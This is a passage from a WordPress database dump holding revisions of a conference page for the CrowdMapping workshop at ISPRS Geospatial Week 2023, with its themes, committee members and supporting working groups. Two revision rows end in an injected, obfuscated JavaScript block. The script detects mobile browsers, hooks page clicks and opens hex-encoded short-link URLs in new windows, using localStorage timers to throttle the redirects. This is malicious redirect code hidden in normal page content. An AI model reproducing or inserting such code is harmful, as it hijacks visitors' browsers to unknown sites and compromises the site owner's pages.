Germany</strong>\r\n<strong>⦁ Tessio Novack, University of Warwick, UK</strong>\r\n<strong>⦁ Bernd Resch, University of Salzburg, Austria</strong>\r\n<strong>⦁ Hansi Senaratne, German Aerospace Center(DLR), Germany</strong>\r\n<strong>⦁ Bisheng Yang, Wuhan University, China</strong>\r\n<strong>⦁ Xiaoxiang Zhu, German Aerospace Center(DLR), Germany</strong>\r\n<strong>⦁ Alexlander Zipf, Universität Heidelberg, Germany</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Supporting ISPRS Working Groups:</strong></h5>\r\n<h6><strong>⦁ WG I/4: LiDAR, Laser Altimetry and Sensor Integration</strong>\r\n<strong>⦁ WG VI/4: Data management for Spatial Scenarios</strong></h6>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','CrowdMapping: Crowdsourcing for Global Mapping','','inherit','closed','closed','','2697-revision-v1','','','2022-10-09 04:27:28','2022-10-09 04:27:28','',2697,'https://gsw2023.com/?p=2703',0,'revision','',0),
(2704,1,'2022-10-09 04:29:44','2022-10-09 04:29:44','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2699\" img_size=\"1000x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Crowdsourcing techniques have been widely employed to detect and map land surface dynamics, such as land use and land cover, human settlements, buildings, and crisis situations. These techniques are applied at regional and global scales to complement or substitute other specialized and expensive physical sensors aboard satellites, unmanned aerial vehicles, ground vehicles, and robots. This workshop will provide a forum for discussion of recent advances in crowdsourcing techniques for mapping global environments. Our goal is to bring together experts in global mapping who utilize Volunteered Geographic Information (VGI), User-Generated-Content, and Citizen Science to establish a common and sustainable ecosystem that will consolidate multi-disciplinary efforts from researchers and practitioners. CrowdMapping will be a key component of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology and Maritime Transport, alongside other related workshops. Since this will be the first joint workshop of the organising team, we propose to allocate a single whole day of the ISPRS Geospatial Week for oral presentations, poster sessions, and hands-on demos aligned to the CrowdMapping context.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][dt_portfolio_masonry image_border_radius=\"0px\" project_icon_border_width=\"0px\" posts_offset=\"0\" category=\"\"][vc_separator][vc_row_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]</p>\n<h5 style=\"text-align:justify; color:red;\" &gt;<strong>Themes of event:</strong></p>\n<h6><strong>⦁ Land use and land cover mapping using crowdsourcing</strong><br />\n<strong>⦁ Fusion of multi-source data for land use monitoring and change detection</strong><br />\n<strong>⦁ Integration of VGI and deep learning</strong><br />\n<strong>⦁ Generation and extraction of high-quality training data from VGI</strong><br />\n<strong>⦁ Satellite image analysis using crowdsourcing data for collaborative mapping </strong><br />\n<strong>⦁ Measures, indicators, and evaluation methods of VGI quality</strong><br />\n<strong>⦁ 3D building reconstruction from VGI data</strong><br />\n<strong>⦁ Crowdsourcing-based indoor mapping</strong><br />\n<strong>⦁ Building semantic enrichment using social media data</strong><br />\n<strong>⦁ OpenStreetMap enrichment</strong><br />\n<strong>⦁ Crisis mapping using web enabled crowdsourcing</strong><br />\n<strong>⦁ Case study of VGI and crowdsourcing disaster relief</strong><br />\n<strong>⦁ Automatically mapping human settlements in rural areas</strong><br />\n<strong>⦁ Humanitarian cartography using OpenStreetMap</strong><br />\n<strong>⦁ Unified platform for earth observation using Citizen Science</strong><br />\n<strong>⦁ Extraction of urban functional regions from location-enabled social networks</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\n<h6><strong>⦁ João Porto de Albuquerque, University of Glasgow, UK</strong><br />\n<strong>⦁ Jamal Jokar Arsanjani, Aalborg University, Denmark</strong><br />\n<strong>⦁ Ana Basiri, University of Glasgow, UK</strong><br />\n<strong>⦁ Lucy Bastin, Aston University, UK</strong><br />\n<strong>⦁ Alexander Brenning, Friedrich Schiller University, Germany</strong><br />\n<strong>⦁ Cidália Fonte, Universidade de Coimbra, Portugal</strong><br />\n<strong>⦁ Jukka Krisp, Universität Augsburg, Germany</strong><br />\n<strong>⦁ Pascal Neis, University of Applied Sciences Mainz, Germany</strong><br />\n<strong>⦁ Tessio Novack, University of Warwick, UK</strong><br />\n<strong>⦁ Bernd Resch, University of Salzburg, Austria</strong><br />\n<strong>⦁ Hansi Senaratne, German Aerospace Center(DLR), Germany</strong><br />\n<strong>⦁ Bisheng Yang, Wuhan University, China</strong><br />\n<strong>⦁ Xiaoxiang Zhu, German Aerospace Center(DLR), Germany</strong><br />\n<strong>⦁ Alexlander Zipf, Universität Heidelberg, Germany</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Supporting ISPRS Working Groups:</strong></h5>\n<h6><strong>⦁ WG I/4: LiDAR, Laser Altimetry and Sensor Integration</strong></h6>\n<h6>\n<strong>⦁ WG VI/4: Data management for Spatial Scenarios</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','CrowdMapping: Crowdsourcing for Global Mapping','','inherit','closed','closed','','2697-revision-v1','','','2022-10-09 04:29:44','2022-10-09 04:29:44','',2697,'https://gsw2023.com/?p=2704',0,'revision','',0),
(2705,1,'2022-10-09 04:35:46','2022-10-09 04:35:46','','Hongchao Fan<br>Norwegian University of Science and Technology, Norway<br>(ICWG IV/III)','','publish','closed','closed','','hongchao-fannorwegian-university-of-science-and-technology-norwayicwg-iv-iii','','','2022-10-14 16:39:48','2022-10-14 16:39:48','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2705',0,'dt_team','',0),
